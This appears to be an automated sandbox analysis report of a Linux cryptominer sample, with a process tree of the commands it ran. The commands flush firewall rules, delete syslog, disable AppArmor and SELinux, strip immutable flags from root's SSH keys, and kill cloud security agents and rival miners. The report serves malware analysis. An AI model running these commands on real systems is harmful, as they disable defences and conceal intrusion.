Analysis
-
max time kernel
150s -
max time network
142s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
15-09-2024 02:46
General
-
Target
e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118
-
Size
64KB
-
MD5
e18e805087ea6f63cf907907dc1d0a08
-
SHA1
ebe527ca26f78e5d347f22f323ee3f11d58cd57a
-
SHA256
e1d7014b84618cd7fbf94439c78fe7d67f351cbc5536885fa3d94ea15325d83b
-
SHA512
92115775959fa27619200334a0add1a448440ae5512aded7bd55937fec1daa0964d54f2e0f881b61515270f5bb783c9d2ab5096fd452529b8af633bff0938784
-
SSDEEP
768:57kFIBuFkc2zq0xvMGd5QP5ez4Z88mqKWCgpK8d7Cuaxz5st3P/hpE90550RQKIR:KF2Lc2Xnd5QhK8dmtq7b50BIR
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 4 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Disables AppArmor 47 IoCs
Disables AppArmor security module.
-
Disables SELinux 11 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 IoCs
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 29 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e18e805087ea6f63cf907907dc1d0a08_JaffaCakes118/tmp/e18e805087ea6f63cf907907dc1d0a08_JaffaCakes1181⤵
- Writes DNS configuration
- Writes file to tmp directory
-
/bin/rmrm -rf /var/log/syslog2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1spdPL-0000C7-Ms4⤵
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1spdPM-0000CA-0c4⤵
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
-
/usr/sbin/serviceservice apparmor stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Enumerates kernel/hardware configuration
-
-
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/usr/sbin/serviceservice aliyun.service stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/systemctlsystemctl disable aliyun.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep aegis2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Yun2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/rmrm -rf /usr/local/aegis2⤵
-
-
/bin/mkdirmkdir /usr/share -p2⤵
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :232⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :33892⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep :66662⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66652⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :66672⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep log_2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep systemten2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep netns2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/local/bin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/usr/bin/killkill -9 103⤵
- Disables SELinux
-
-
/sbin/killkill -9 103⤵
- Disables SELinux
-
-
/bin/killkill -9 103⤵
- Disables SELinux
- Reads CPU attributes
-
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep voltuned2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep darwin2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep svc2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0302⤵
- Disables SELinux
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/bin/grepgrep -v _2⤵
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep rsync2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchd0g2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 158.69.133.18:82202⤵
- Disables SELinux
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
